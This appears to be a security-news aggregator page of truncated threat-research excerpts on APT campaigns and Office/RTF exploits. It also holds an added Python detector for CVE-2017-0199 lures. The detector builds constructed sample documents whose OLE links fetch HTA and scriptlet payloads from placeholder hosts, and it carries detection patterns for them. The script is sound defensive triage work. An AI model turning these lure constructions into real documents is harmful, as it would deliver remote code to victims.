- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Securelist
GreyEnergy’s overlap with Zebrocy
blogs_securelist·2019-01-24·CVSS 7.8
[HIGH] GreyEnergy’s overlap with Zebrocy
Table of Contents
- Details
- Conclusions
Authors
- Kaspersky ICS CERT
In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.
Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s target
Fortinet
A Deep Analysis of the Microsoft Outlook Vulnerability CVE-2018-8587
blogs_fortinet·2018-12-16·CVSS 7.8
CVE-2018-8587 [HIGH] A Deep Analysis of the Microsoft Outlook Vulnerability CVE-2018-8587
FORTIGUARD LABS THREAT RESEARCH
A Deep Analysis of the Microsoft Outlook Vulnerability CVE-2018-8587
By Yonghui Han | December 16, 2018
FortiGuard Labs Threat Analysis Report
Earlier this year, Fortinet's FortiGuard Labs researcher Yonghui Han reported a Heap Corruption vulnerability in Office Outlook to Microsoft by following Fortinet’s responsible disclosure process. On Patch Tuesday of December 2018, Microsoft announced that they had fixed this vulnerability, released a corresponding advisory, and assigned it the vulnerability identifier CVE-2018-8587.
Microsoft Outlook is one of the components of the Microsoft Office suite that is widely used to send and receive emails, manage contacts, record and track schedules, and perform other tasks. The Heap Corruption vulnerability was fou
Fortinet
Exploiting an RCE bug in the UDP Protocol implemented in FreeRTOS
blogs_fortinet·2018-12-04·CVSS 8.1
CVE-2018-16525 [HIGH] Exploiting an RCE bug in the UDP Protocol implemented in FreeRTOS
FORTIGUARD LABS THREAT RESEARCH
Exploiting an RCE bug in the UDP Protocol implemented in FreeRTOS
By Amir Zali | December 04, 2018
Recently, I saw a report about several bugs that were found on FreeRTOS. Curiosity got the best of me, and I started to take a look to see what can be done from the IPS side to protect our customers because of importance of IoT devices and the popularity of this operating system. (Since the initial report more details have been made available here, CVE-2018-16525.)
In this post I will just elaborate on a single RCE bug that I have managed to exploit in the UDP protocol which is implemented in FreeRTOS+TCP.
RTOS, Real Time Operating System, is a type of operating system that provides deterministic execution. AWS FreeRTOS is a class of RTOS from Amazon Web Se
Fortinet
Patch Your Microsoft Outlook: Fortinet Discovered Four Outlook Remote Code Execution Vulnerabilities
blogs_fortinet·2018-11-13·CVSS 7.8
[HIGH] Patch Your Microsoft Outlook: Fortinet Discovered Four Outlook Remote Code Execution Vulnerabilities
FORTIGUARD LABS THREAT RESEARCH
Patch Your Microsoft Outlook: Fortinet Discovered Four Outlook Remote Code Execution Vulnerabilities
By Yonghui Han | November 13, 2018
FortiGuard Labs Breaking Threat Research
This Patch Tuesday, November 13, 2018, Microsoft patched six vulnerabilities discovered in Microsoft Outlook. Four of them were discovered and reported by Fortinet researcher Yonghui Han by following Fortinet’s responsible disclosure process. The CVE numbers assigned to them are CVE-2018-8522, CVE-2018-8524, CVE-2018-8576 and CVE-2018-8582. All Microsoft Outlook versions from 2010 to 2019 are affected. All four of these vulnerabilities could lead to remote code execution and have been given an Important rating by Microsoft. In this post we will provide more details on these
Unit42
New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
blogs_unit42·2018-10-25·CVSS 7.8
CVE-2017-0199 [HIGH] New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
## New Techniques to Uncover and Attribute Cobalt Gang Commodity Builders and Infrastructure Revealed
Unit 42
Published: October 25, 2018
Nowadays, it’s very easy for an advanced attacker to use commodity tools and malware along with very simple initial delivery methods to keep a low profile and stay away from possible attribution. One of the most common approaches is the use of spear phishing emails employing social engineering or commonly used exploits (such as CVE-2017-0199 or the ThreadKit builder) to trick the employees of organizations of interest. It is once the initial infection has occurred that the attacker becomes more sophisticated, deploying advanced custom pieces of malware, more advanced tools, and/or using living-off-the-land tools (such as the use of PowerShell, or tools like CMSTP or Regsvr32).
This approach makes it more difficult for threat hunters and defenders to find those needles in the haystack necessa
Fortinet
An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)
blogs_fortinet·2018-10-19·CVSS 7.5
CVE-2018-8467 [HIGH] An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)
FORTIGUARD LABS THREAT RESEARCH
An Analysis of Microsoft Edge Chakra JavascriptArray TypeId Handling Memory Corruption (CVE-2018-8467)
By Dehui Yin | October 19, 2018
The JavaScript type confusion bug is a critical vulnerability class that exists in many popular browsers. It causes memory corruption and can possibly be exploited to execute arbitrary code when a vulnerable system browses a malicious web page. A growing number of these type confusion bugs in the Microsoft Chakra engine have been disclosed and fixed over the past several months.
CVE-2018-8467 is one of the classic ‘Type Confusion’ bugs in the Microsoft Edge Chakra Engine that was fixed by Microsoft several weeks ago. In this post, the team at FortiGuard Labs looks deeply into the Microsoft Edge Chakra Engine assembly codes
Talos
Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
blogs_talos·2018-10-15·CVSS 7.8
[HIGH] Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
## Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox
This blog post was authored by Edmund Brumaghin and Holger Unterbrink with contributions from Emmanuel Tacheau.
## Executive Summary
Cisco Talos has discovered a new malware campaign that drops the sophisticated information-stealing trojan called "Agent Tesla," and other malware such as the Loki information stealer. Initially, Talos' telemetry systems detected a highly suspicious document that wasn't picked up by common antivirus solutions. However, Threat Grid, Cisco's unified malware analysis and threat intelligence platform, identified the unknown file as malware. The adversaries behind this malware use a well-known exploit chain, but modified it in such a way so that antivirus solutions don't detect it. In this post, we will outline the steps the adversaries took to remain undetecte
Fortinet
Microsoft JET Database Engine Code Execution Vulnerability
blogs_fortinet·2018-09-14·CVSS 7.8
CVE-2018-8392 [HIGH] Microsoft JET Database Engine Code Execution Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Microsoft JET Database Engine Code Execution Vulnerability
By Honggang Ren | September 14, 2018
This June, FortiGuard Labs researcher Honggang Ren discovered a code execution vulnerability in the Windows JET Database Engine and reported it to Microsoft using the responsible disclosure process. On the patch Tuesday of September 2018, Microsoft released a Security Advisory that contains the fix for this vulnerability, identifying it as CVE-2018-8392.
The Microsoft JET Database Engine is a database engine on which several Microsoft products have been built. A database engine is the underlying component of a database, a collection of information stored on a computer in a systematic way.
The vulnerable DLL msexcl40.dll identified by FortiGuard Labs is a comp
Fortinet
Russian Army Exhibition Decoy Leads to New BISKVIT Malware
blogs_fortinet·2018-08-20·CVSS 7.8
CVE-2017-0199 [HIGH] Russian Army Exhibition Decoy Leads to New BISKVIT Malware
FORTIGUARD LABS THREAT RESEARCH
Russian Army Exhibition Decoy Leads to New BISKVIT Malware
By Jasper Manuel and Rommel Joven | August 20, 2018
A few days ago, the FortiGuard Labs team found a malicious PPSX file exploiting CVE-2017-0199 that had been crafted for Russian speakers. The filename “Выставка” when translated means “Exhibition”. On further examination, the PPSX file seems to have been targeted at an exhibition being held annually in Russia called Army 2018 International Military and Technical Forum. This is one of the largest exhibitions of military weapons and special equipment, not only in Russia, but also one of the outstanding events among similar exhibitions in the world. The discovery of this malicious document is very timely since the event is scheduled to be held August
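The Talos RTF campaign and the FortiGuard PPSX lure above are both CVE-2017-0199 delivery documents, and both carry the same document-level tell: an OLE link that Office is told to refresh on open, pointing at a remote moniker. The script below is an added triage example written for this page, not code from Talos, FortiGuard Labs or any other report listed here. It flags, in RTF, the `\objautlink` / `\objupdate` control words plus a URL moniker CLSID or URL inside the decoded `\objdata` hex, and, in OOXML packages (docx/pptx/ppsx), relationship parts that point an OLE object at an external or `script:` target. The two sample documents it builds are constructed for the demo (hypothetical `example.invalid` URLs, simplified OLE1 header bytes), not real samples.

```python
"""Static triage of documents for CVE-2017-0199-style lure traits.

Added example for this page, not code from any of the reports it lists.
The sample documents built below are constructed for the demo, not real samples.
"""
import binascii
import io
import re
import sys
import xml.etree.ElementTree as ET  # prefer defusedxml for untrusted input in production
import zipfile

# URL moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} in on-disk GUID byte order,
# which is how it appears inside decoded \objdata.
URL_MONIKER_BYTES = binascii.unhexlify("e0c9ea79f9bace118c8200aa004ba90b")

# Control words that make Word refresh a linked object without user interaction.
RTF_AUTO_CONTROL_WORDS = (b"\\objautlink", b"\\objupdate")
# Hex payload following \objdata (whitespace-tolerant; stops at the closing brace).
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
# Printable UTF-16LE runs, the encoding the moniker uses for its URL.
UTF16_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def scan_rtf(data: bytes) -> list[str]:
    """Return indicator strings found in an RTF byte string (empty list = nothing suspicious)."""
    findings = [f"rtf:{cw.decode()}" for cw in RTF_AUTO_CONTROL_WORDS if cw in data]
    for match in OBJDATA_RE.finditer(data):
        hexblob = re.sub(rb"\s+", b"", match.group(1))
        try:
            blob = binascii.unhexlify(hexblob[: len(hexblob) & ~1])  # drop a dangling nibble
        except binascii.Error:
            continue
        if URL_MONIKER_BYTES in blob:
            findings.append("rtf:url-moniker-clsid")
        for run in UTF16_RUN_RE.finditer(blob):
            url = re.search(r"(?:https?|file)://\S+", run.group(0).decode("utf-16-le"))
            if url:
                findings.append(f"rtf:url:{url.group(0)}")
    return findings


def scan_ooxml(data: bytes) -> list[str]:
    """Return indicator strings for external OLE/script relationship targets in an OOXML zip."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["ooxml:not-a-zip"]
    with archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(archive.read(name))
            except ET.ParseError:
                continue
            for rel in root.iter():
                if rel.attrib.get("TargetMode") != "External":
                    continue
                target = rel.attrib.get("Target", "")
                rel_type = rel.attrib.get("Type", "").rsplit("/", 1)[-1]
                # script: monikers are never legitimate; external OLE links are rare but possible
                if target.lower().startswith("script:") or rel_type == "oleObject":
                    findings.append(f"ooxml:{name}:{rel_type}:{target}")
    return findings


def triage(data: bytes) -> list[str]:
    """Dispatch on file magic; unknown formats yield no findings."""
    if data.startswith(b"{\\rt"):
        return scan_rtf(data)
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    return []


def build_sample_rtf(url: str = "http://example.invalid/update.hta") -> bytes:
    """Constructed lure-shaped RTF: auto-updating OLE link whose objdata holds a URL moniker."""
    wide = url.encode("utf-16-le")
    moniker = URL_MONIKER_BYTES + len(wide).to_bytes(4, "little") + wide + b"\x00\x00"
    objdata = binascii.hexlify(b"\x01\x05\x00\x00\x02\x00\x00\x00" + moniker).decode()
    return ("{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata " + objdata + "}}}").encode()


def build_sample_ppsx(target: str = "script:http://example.invalid/logo.sct") -> bytes:
    """Constructed minimal PPSX-like zip whose slide rels link an OLE object to a script: moniker."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId2" TargetMode="External" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        f'Target="{target}"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    samples = {"sample.rtf": build_sample_rtf(), "sample.ppsx": build_sample_ppsx()}
    for path in sys.argv[1:]:  # any real files given on the command line are scanned too
        with open(path, "rb") as fh:
            samples[path] = fh.read()
    for name, doc in samples.items():
        print(name, triage(doc) or "clean")
```

Run it with no arguments to see the two constructed samples flagged, or pass suspicious files as arguments. Treat the output as triage, not a verdict: in-the-wild RTF lures (the Talos post is one case) interleave junk and control words inside the `\objdata` hex, which this contiguous-hex regex will not reassemble, so use a real RTF parser such as oletools' `rtfobj` for production, and expect benign documents with linked OLE objects to trip the `oleObject` external-target check.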
Securelist
IT threat evolution Q2 2018. Statistics
blogs_securelist·2018-08-06
IT threat evolution Q2 2018. Statistics
Table of Contents
- Q2 figures
- Mobile threats
- Attacks on IoT devices
- Online threats in the financial sector
- Vulnerable apps used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q2 figures
According to KSN:
- Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
- 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
- Ransomware attacks were registered on the computers of 158,921 unique users.
- Our File Anti-Virus logged 192,053,
Unit42
The Gorgon Group: Slithering Between Nation State and Cybercrime
blogs_unit42·2018-08-02·CVSS 7.8
CVE-2017-0199 [HIGH] The Gorgon Group: Slithering Between Nation State and Cybercrime
## The Gorgon Group: Slithering Between Nation State and Cybercrime
Robert Falcone
David Fuertes
Josh Grunzweig
Kyle Wilhoit
Published: August 2, 2018
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
CVE-2017-0199
Gorgon Group
Subaat
Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis of some of the attacks, as well as attribution links with Pakistan actors, has already been described by 360 and Tuisec, who found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.
In addition to the numerous targeted attacks, Unit 42 discovered that the group also performed a litany of attacks and operations around the globe, involving both cri
Unit42
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
blogs_unit42·2018-07-24
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
## Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
Liat Hayun
Published: July 24, 2018
High Profile Threats
Malware
Embedded Flash files
HTA Handlers
Macros
Microsoft Office Documents
OLE Objects
Nearly all of us have a use for Microsoft Office documents. Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an Office document we receive as an attachment in e-mail. Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.
In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint; some we’ve already posted about before, and some are new.
Macros
Macros are the most straightforward way for an attacker to weaponize Office documents. Office applicatio
Talos
My Little FormBook
blogs_talos·2018-06-20·CVSS 7.8
[HIGH] My Little FormBook
This blog post is authored by Warren Mercer and Paul Rascagneres.
## Summary
Cisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.
The author put a lot of effort in the infection vector using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office documen
Fortinet
Non-Russian Matryoshka: Russian Service Centers Under Attack
blogs_fortinet·2018-06-07
Non-Russian Matryoshka: Russian Service Centers Under Attack
FORTIGUARD LABS THREAT RESEARCH
Non-Russian Matryoshka: Russian Service Centers Under Attack
By Artem Semenchenko, Evgeny Ananin, and Yueh Ting Chen | June 07, 2018
With the help of FortiGuard’s in-house Threat Intelligence Platform (Kadena), FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.
A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.
In this article we will overview every stage of these attacks. In addition, we will try to find any
Fortinet
Buffer Overflow Attack Targeting Microsoft IIS 6.0 Returns
blogs_fortinet·2018-05-23·CVSS 9.8
CVE-2017-7269 [CRITICAL] Buffer Overflow Attack Targeting Microsoft IIS 6.0 Returns
FORTIGUARD LABS THREAT RESEARCH
Buffer Overflow Attack Targeting Microsoft IIS 6.0 Returns
By Bing Liu | May 23, 2018
There is a buffer overflow vulnerability in the WebDAV service in Microsoft IIS 6.0 identified as CVE-2017-7269 that allows remote attackers to execute arbitrary code via a long HTTP header. This vulnerability was reportedly first exploited in July or August of 2016, and the PoC was publicly disclosed in March 2017 on GitHub. Over the past month, however, FortiGuard Labs has been documenting a spike in new attacks targeting this vulnerability, peaking on Apr 13, 2018 when we logged over 4 million triggers.
Fortinet released an IPS signature for this vulnerability in March of 2017 named MS.IIS.WebDAV.PROPFIND.ScStoragePathFromUrl.Buffer.Overflow. The daily trigger rate of
Fortinet
An Analysis of Microsoft Edge Chakra NewScObjectNoCtor Array Type Confusion (CVE-2018-0838)
blogs_fortinet·2018-05-18·CVSS 7.5
CVE-2018-0838 [HIGH] An Analysis of Microsoft Edge Chakra NewScObjectNoCtor Array Type Confusion (CVE-2018-0838)
FORTIGUARD LABS THREAT RESEARCH
An Analysis of Microsoft Edge Chakra NewScObjectNoCtor Array Type Confusion (CVE-2018-0838)
By Dehui Yin | May 18, 2018
CVE-2018-0838 is one of the ‘type confusion’ bugs in the Microsoft Edge Chakra Engine that was fixed by Microsoft three months ago. This bug causes memory corruption and can possibly be exploited to execute arbitrary code when a vulnerable system browses a malicious web page via Microsoft Edge.
This type confusion bug occurs when the codes generated by the Chakra just-in-time (JIT) java compiler change the property value of a newly converted JavascriptArray object without validation. In this post, the team at FortiGuard Labs looks deeply into the Microsoft Edge Chakra Engine assembly codes to expose the root cause of this vulnerability.
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps used by cybercriminals
- Malicious programs online (attacks via web resources)
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q1 figures
According to KSN:
- Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
- 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
- Ransomware attacks were registered on the computers of 179,934 unique users.
- Our File Anti-Virus logged 187,597,494 unique malicious and potentially
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
- Vladislav Stolyarov
- Boris Larin
- Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox, more than two years after the last in-the-wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
### Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After
Zscaler
Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
blogs_zscaler·2018-04-26·CVSS 7.8
[HIGH] Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
Fortinet
A root cause analysis of CVE-2018-0797 - Rich Text Format Stylesheet Use-After-Free vulnerability
blogs_fortinet·2018-04-01·CVSS 7.8
CVE-2018-0797 [HIGH] A root cause analysis of CVE-2018-0797 - Rich Text Format Stylesheet Use-After-Free vulnerability
FORTIGUARD LABS THREAT RESEARCH
A root cause analysis of CVE-2018-0797 - Rich Text Format Stylesheet Use-After-Free vulnerability
By Wayne Chin Yick Low | April 01, 2018
Over the last few months, the Microsoft Security Response Centre (MSRC) has released a number of Windows updates to fix multiple Use-After-Free (UAF) vulnerabilities discovered by FortiGuard Labs. As stated in our previous blog post, we will provide a technical write-up for one of the UAF issues that was rated as critical by MSRC. The issue is assigned to CVE-2018-0797. In this blog post we will share our methodologies in identifying the root cause of the issue, as well as an analysis of the mitigation deployed by Microsoft to address the UAF vulnerability.
Please take note that the following analysis was performed on M
Fortinet
FortiGuard Labs Discovers Multiple Use-After-Free Vulnerabilities in Microsoft Word
blogs_fortinet·2018-03-22·CVSS 7.8
[HIGH] FortiGuard Labs Discovers Multiple Use-After-Free Vulnerabilities in Microsoft Word
FORTIGUARD LABS THREAT RESEARCH
FortiGuard Labs Discovers Multiple Use-After-Free Vulnerabilities in Microsoft Word
By Wayne Chin Yick Low | March 22, 2018
During the last few months, FortiGuard Labs discovered and reported multiple use-after-free (UAF) vulnerabilities found in different versions of Microsoft Word. These vulnerabilities were patched in the January and March security updates, respectively. These patches are rated as critical/important, and as always, we urge users to update Microsoft Office as soon as possible.
Use-after-free refers to a vulnerability that allows an attacker to access memory after it has been freed, which can cause a program to crash, allow the execution of arbitrary code, or even enable full remote code execution. Following are some details of the UAF vuln
Zscaler
Malicious RTF Documents Spreading Malware | Zscaler Blog
blogs_zscaler·2018-02-20
Malicious RTF Documents Spreading Malware | Zscaler Blog
Fortinet
FortiGuard Labs Discovers Vulnerability in Asus Router
blogs_fortinet·2018-01-30·CVSS 9.8
[CRITICAL] FortiGuard Labs Discovers Vulnerability in Asus Router
FORTIGUARD LABS THREAT RESEARCH
FortiGuard Labs Discovers Vulnerability in Asus Router
By David Maciejak | January 30, 2018
Over the last few weeks, ASUS released a series of patches aimed at addressing a number of vulnerabilities discovered in their RT routers running AsusWRT firmware. The models listed at the end of this post are known to be vulnerable. If you are not sure which model or firmware you are using, I recommend double-checking the ASUS support website to get the latest information and updates.
FG-VD-17-216 is an ASUS authenticated remote code execution vulnerability that FortiGuard Labs originally discovered and reported (CVE-2018-9285). If your web management portal is available via your WAN connection, and you don’t use that feature, we recommend disabling it (it’s not
Unit42
The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
blogs_unit42·2018-01-26
The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
## The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services
Josh Grunzweig
Published: January 26, 2018
Malware
Nation-State Cyberattacks
Threat Research
Core
DustySky
Palestinian Territories
Scote
TopHat
Summary
In recent months, Palo Alto Networks Unit 42 observed a wave of attacks leveraging popular third-party services Google+, Pastebin, and bit.ly. Attackers used Arabic language decoy documents related to current events within the Palestine Territories as lures to entice victims to open and subsequently be infected by the malware. There is data indicating that these attacks are targeting individuals or organizations within the Palestinian Territories, which is detailed later.
The attacks themselves are deployed via four different means, two involving malicious RTF files, one involving self-extracting Windows executables, and the final using RAR archives.
The ultimate payload is a new malware family that we have dubbed “Scote” based on strings we found within the malware samples. Sco
Talos
Korea In The Crosshairs
blogs_talos·2018-01-16·CVSS 7.8
[HIGH] Korea In The Crosshairs
This blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An.
A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean targets.
## Executive Summary
This article exposes the malicious activities of Group 123 during 2017. We assess with high confidence that Group 123 was responsible for the following six campaigns:
- "Golden Time" campaign.
- "Evil New Year" campaign.
- "Are you Happy?" campaign.
- "FreeMilk" campaign.
- "North Korean Human Rights" campaign.
- "Evil New Year 2018" campaign.
On January 2nd of 2018, the "Evil New Year 2018" was started. This campaign copies the approach of the 2017 "Evil New Year" campaign.
The links between the different campaigns include shared code and compiler a
Trendmicro
Untangling the Patchwork Cyberespionage Group
blogs_trendmicro·2017-12-11
Untangling the Patchwork Cyberespionage Group
Cyber Crime
# Untangling the Patchwork Cyberespionage Group
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets.
By: Daniel Lunghi, Jaromir Horejsi, Cedric Pernet
2017/12/11
Updated as of October 9, 2018, 7:24PM PDT to remove Socksbot and update the appendix and technical brief; hat tip to Michael Yip of Accenture Security for an earlier research on Socksbot.
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets. Patchwork’s moniker is from its notoriety for rehashing off-the-rack tools and malwa
Fortinet
Cobalt Malware Strikes Using CVE-2017-11882 RTF Vulnerability
blogs_fortinet·2017-11-27·CVSS 7.8
CVE-2017-11882 [HIGH] Cobalt Malware Strikes Using CVE-2017-11882 RTF Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Cobalt Malware Strikes Using CVE-2017-11882 RTF Vulnerability
By Jasper Manuel and Joie Salvio | November 27, 2017
Only a few days after FortiGuard Labs published an article about a spam campaign exploiting an RTF document, our Kadena Threat Intelligence System (KTIS) has found another spam campaign using an even more recent document vulnerability, CVE-2017-11882. Although the vulnerability has existed for 17 years, according to a report by SecurityWeek, it was only disclosed and patched by Microsoft in the second week of this month.
And as we have repeatedly seen, not long after its disclosure threat actors were quick to take advantage of this vulnerability to deliver malware using a component from a well-known penetration testing tool, Cobalt Strike.
Fortinet
CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document
blogs_fortinet·2017-11-22·CVSS 7.8
CVE-2017-11826 [HIGH] CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document
FORTIGUARD LABS THREAT RESEARCH
CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document
By Jasper Manuel, Joie Salvio and Wayne Low | November 22, 2017
Recently, FortiGuard Labs found an interesting malware campaign using the recently documented vulnerability CVE-2017-11826 that was patched by Microsoft in October of this year. A detailed analysis of this exploit is also included in this article.
Based on the context of the campaign used to lure victims, as well as how the payload malware behaves, we had a hunch that this was not a common cybercrime campaign and was even possibly a targeted attack on specific institutions or locales. For this reason, we decided to look deeper.
As is common with this type of attack, the command-and-control (C2) server for this campaign
Securelist
APT Trends report Q3 2017
blogs_securelist·2017-11-14
APT Trends report Q3 2017
Table of Contents
Introduction
Chinese-Speaking Actors
Russian-Speaking Actors
English-Speaking Actors
Korean-Speaking Actors
Other Activity
Final Thoughts
Authors
GReAT
## Introduction
Beginning in the second quarter of 2017, Kaspersky’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.
As stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For brevity’s
Securelist
IT threat evolution Q3 2017. Statistics
blogs_securelist·2017-11-10
IT threat evolution Q3 2017. Statistics
Table of Contents
- Q3 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
## Q3 figures
According to KSN data:
- Kaspersky Lab solutions detected and repelled 277,646,376 malicious attacks from online resources located in 185 countries all over the world.
- 72,012,219 unique URLs were recognized as malicious by web antivirus components.
- Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 204,388 user computers.
- Crypto ransomware attacks were blocked on the computers of 186,283 unique users.
- Kaspersky Lab’s file antivirus detected a total of 198,228,428 unique malicious and potentially
Securelist
Spam and phishing in Q3 2017
blogs_securelist·2017-11-03
Spam and phishing in Q3 2017
Table of Contents
- Quarterly highlights
- Statistics
- Phishing
- Conclusion
Authors
- Darya Gudkova
- Maria Vergelis
- Tatyana Shcherbakova
- Nadezhda Demidova
## Quarterly highlights
### Blockchain and spam
Cryptocurrencies have been a regular theme in the media for several years now. Financial analysts predict a great future for them, various governments are thinking about launching their own currencies, and graphics cards are swept off the shelves as soon as they go on sale. Of course, spammers could not resist the topics of cryptocurrency, mining and blockchain technology.
Last quarter we wrote that many Trojans were downloading ‘miners’ as a payload on victims’ computers, and in third quarter of 2017 this practice became even more widespread.
#### Fraud, cryptocurrencies an
Securelist
Gaza Cybergang – updated activity in 2017:
blogs_securelist·2017-10-30
Gaza Cybergang – updated activity in 2017:
Authors
Mohamad Amin Hasbini
Ghareeb Saad
## New targets, use of MS Access Macros and CVE 2017-0199, and possible mobile espionage
## 1. Summary information
The Gaza cybergang is an Arabic-language, politically-motivated cybercriminal group, operating since 2012 and actively targeting the MENA (Middle East North Africa) region. The Gaza cybergang’s attacks have never slowed down and its typical targets include government entities/embassies, oil and gas, media/press, activists, politicians, and diplomats.
One of the interesting new facts, uncovered in mid-2017, is its discovery inside an oil and gas organization in the MENA region, infiltrating systems and pilfering data, apparently for more than a year.
Another interesting finding is the use of the recently discovered CVE 2017-0199
Unit42
Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
blogs_unit42·2017-10-27·CVSS 8.8
CVE-2012-0158 [HIGH] Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
## Tracking Subaat: Targeted Phishing Attack Leads to Threat Actor's Repository
Unit 42
Published: October 27, 2017
Malware
Threat Research
Vulnerabilities
CVE-2012-0158
Downloader
Phishing
QuasarRAT
Subaat
